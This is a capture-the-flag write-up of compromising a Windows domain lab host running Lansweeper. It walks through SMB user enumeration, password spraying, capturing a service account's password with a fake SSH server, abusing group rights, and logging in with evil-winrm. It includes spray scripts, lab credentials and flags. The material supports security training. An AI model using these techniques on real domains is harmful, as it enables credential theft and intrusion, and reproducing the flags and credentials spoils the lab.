- 10.10.92.66
Enumeration
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
82/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=Lansweeper Secure Website
| Subject Alternative Name: DNS:localhost, DNS:localhost, DNS:localhost
| Not valid before: 2021-11-21T09:22:27
|_Not valid after: 2121-12-21T09:22:27
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-02 21:59:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SWEEP
| NetBIOS_Domain_Name: SWEEP
| NetBIOS_Computer_Name: INVENTORY
| DNS_Domain_Name: sweep.vl
| DNS_Computer_Name: inventory.sweep.vl
| DNS_Tree_Name: sweep.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-01-02T21:59:52+00:00
| ssl-cert: Subject: commonName=inventory.sweep.vl
| Not valid before: 2025-01-01T21:55:18
|_Not valid after: 2025-07-03T21:55:18
|_ssl-date: 2025-01-02T22:00:33+00:00; -1s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-01-02T21:59:53
|_ start_date: N/A
- Ports 81 (HTTP) and 82 (HTTPS) serve a Lansweeper web application that redirects to /login.aspx, so it is an ASP.NET site running on Microsoft's HTTPAPI/IIS stack.
- Port 445 (SMB) is open.
- Port 389 (LDAP) is open; together with Kerberos on 88 and the global catalog on 3268/3269 this tells us the host is a domain controller for sweep.vl.
- Port 3389 (RDP) is open.
- The FQDN is inventory.sweep.vl.
- Let's first add the host to /etc/hosts so that inventory.sweep.vl and sweep.vl resolve to the target.
- Then edit /etc/krb5.conf to define the SWEEP.VL realm with inventory.sweep.vl as KDC, so that Kerberos authentication works from the attacking machine.
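As an added example (not part of the original write-up), a small POSIX shell script that renders the /etc/hosts entry and a minimal /etc/krb5.conf from the values nmap returned (target IP, domain sweep.vl, DC hostname inventory). The file paths, the choice to disable DNS lookup of the KDC, and the attacker-side usage are my assumptions; the script only prints the content, writing it to the real files is left to the commented usage line.

```shell
#!/bin/sh
# Added example: generate the /etc/hosts line and a minimal krb5.conf for the
# sweep.vl domain found during enumeration. Values come from the nmap output;
# the output paths in the usage comment are assumptions.

TARGET_IP="10.10.92.66"
DOMAIN="sweep.vl"
DC_HOST="inventory"

# hosts_entry IP DOMAIN HOST
# FQDN, short hostname and the domain name itself all resolve to the DC,
# which is what smbclient, netexec, kinit and BloodHound expect.
hosts_entry() {
    printf '%s %s.%s %s %s\n' "$1" "$3" "$2" "$3" "$2"
}

# krb5_conf DOMAIN DC_FQDN
# Kerberos realm names are upper-case; on a single-DC domain the DC is both
# KDC and admin server. DNS lookups are disabled so the static mapping wins.
krb5_conf() {
    domain="$1"; dc_fqdn="$2"
    realm=$(printf '%s' "$domain" | tr '[:lower:]' '[:upper:]')
    cat <<EOF
[libdefaults]
    default_realm = $realm
    dns_lookup_kdc = false
    dns_lookup_realm = false

[realms]
    $realm = {
        kdc = $dc_fqdn
        admin_server = $dc_fqdn
    }

[domain_realm]
    .$domain = $realm
    $domain = $realm
EOF
}

# Usage (root needed to write the real files; assumed paths):
#   hosts_entry "$TARGET_IP" "$DOMAIN" "$DC_HOST" | sudo tee -a /etc/hosts
#   krb5_conf "$DOMAIN" "$DC_HOST.$DOMAIN" | sudo tee /etc/krb5.conf
```

After writing both files, `kinit intern@SWEEP.VL` followed by `klist` is the quickest check that the realm mapping and the -1s clock skew reported by nmap are acceptable.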

Port 445
- We have guest access to certain shares.
- Let's use smbclient to see if we can find anything interesting.
- Found a few files on the DefaultPackageShare$ share (Lansweeper's deployment package share), but nothing that could be used directly.

- Let's now get a list of all users by RID brute-forcing over the guest session (the --rid-brute option in netexec/crackmapexec) and save them to a file:
Administrator
INVENTORY$
jgre808
bcla614
hmar648
jgar931
fcla801
jwil197
grob171
fdav736
jsmi791
hjoh690
svc_inventory_win
svc_inventory_lnx
intern
Lansweeper
- That gives us several domain users and one machine account (INVENTORY$). The names svc_inventory_win and svc_inventory_lnx suggest the service accounts Lansweeper uses to scan Windows and Linux hosts.
- Let's now do some password spraying, trying each username as its own password.
- User intern has the password intern.
- We re-enumerated the share permissions with the obtained intern:intern credentials.
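As an added example (not part of the original write-up), a POSIX shell script that turns raw RID-brute output into a clean user list and a username-as-password spray list, covering the two steps above (user enumeration and the spray that found intern:intern). The sample RID-brute lines are constructed to mimic netexec's output format, and the netexec invocation in do_spray, which only runs when the script is called with the argument spray, is my assumption about the tool's CLI.

```shell
#!/bin/sh
# Added example: build a spray list from RID-brute output. The sample lines
# below are constructed (not captured from the target) in netexec's format.
SAMPLE_RID_OUTPUT='SMB  10.10.92.66  445  INVENTORY  500: SWEEP\Administrator (SidTypeUser)
SMB  10.10.92.66  445  INVENTORY  512: SWEEP\Domain Admins (SidTypeGroup)
SMB  10.10.92.66  445  INVENTORY  1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB  10.10.92.66  445  INVENTORY  1104: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB  10.10.92.66  445  INVENTORY  1110: SWEEP\intern (SidTypeUser)'

# Keep only user objects, strip the DOMAIN\ prefix and drop machine accounts
# (trailing $): groups cannot log on and machine passwords are random.
extract_users() {
    grep 'SidTypeUser' | sed 's/.*\\//; s/ (SidTypeUser)//' | grep -v '\$$'
}

# Emit "user:password" pairs using the lower-cased username as password, the
# weak default that worked for intern on this box.
spray_pairs() {
    while IFS= read -r u; do
        [ -n "$u" ] || continue
        printf '%s:%s\n' "$u" "$(printf '%s' "$u" | tr '[:upper:]' '[:lower:]')"
    done
}

# Network step, not run by default (assumed netexec flags). --no-bruteforce
# pairs the i-th user with the i-th password instead of trying every
# combination, which keeps the attempt count at one per account and avoids
# lockouts; --continue-on-success keeps going after the first valid hit.
do_spray() {
    target="$1"; pairs="$2"
    cut -d: -f1 "$pairs" > /tmp/users.txt
    cut -d: -f2 "$pairs" > /tmp/passes.txt
    nxc smb "$target" -u /tmp/users.txt -p /tmp/passes.txt --no-bruteforce --continue-on-success
}

if [ "${1:-}" = spray ]; then
    printf '%s\n' "$SAMPLE_RID_OUTPUT" | extract_users | spray_pairs > /tmp/pairs.txt
    do_spray "${2:-10.10.92.66}" /tmp/pairs.txt
fi
```

In a real run, replace SAMPLE_RID_OUTPUT with the saved `--rid-brute` output and check the domain lockout policy (`nxc smb <target> -u intern -p intern --pass-pol`) before spraying anything beyond one guess per account.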

PORT 389
- Queried as intern, the domain's ms-DS-MachineAccountQuota is 10, so any authenticated user can add up to 10 machine accounts.
- Performed BloodHound enumeration with intern:intern.
PORT 81 and 82
- Lansweeper is running and accepts the domain credentials intern:intern.
- To get a foothold I used the scanning targets page: created a new IP range scan and, under scanning credentials, mapped the Linux credential (svc_inventory_lnx) to it. Lansweeper then tries to SSH into every host in the range with that credential, so with the range set to my own IP the plaintext password is sent to whatever is listening on port 22.
- fakessh is a fake SSH server that logs the credentials clients present; the setcap call lets it bind the privileged port 22 without running as root:
go install github.com/fffaraz/fakessh@latest
sudo setcap 'cap_net_bind_service=+ep' ~/go/bin/fakessh
- We captured the following password for user svc_inventory_lnx:
0|5m-U6?/uAX


- svc_inventory_lnx has GenericAll over the LANSWEEPER ADMINS group, which lets us add the account to that group:
net rpc group addmem "LANSWEEPER ADMINS" "svc_inventory_lnx" -U "sweep.vl"/"svc_inventory_lnx"%'0|5m-U6?/uAX' -S "inventory.sweep.vl"

Initial Access
- After the group change we can log in with evil-winrm as svc_inventory_lnx:
evil-winrm -i 10.10.105.103 -u svc_inventory_lnx -p '0|5m-U6?/uAX'

VL{d0f2522312ba549fd2daca09e293bfd1}
VL{06a6c584a3492df1807f1d7c4de0ec56}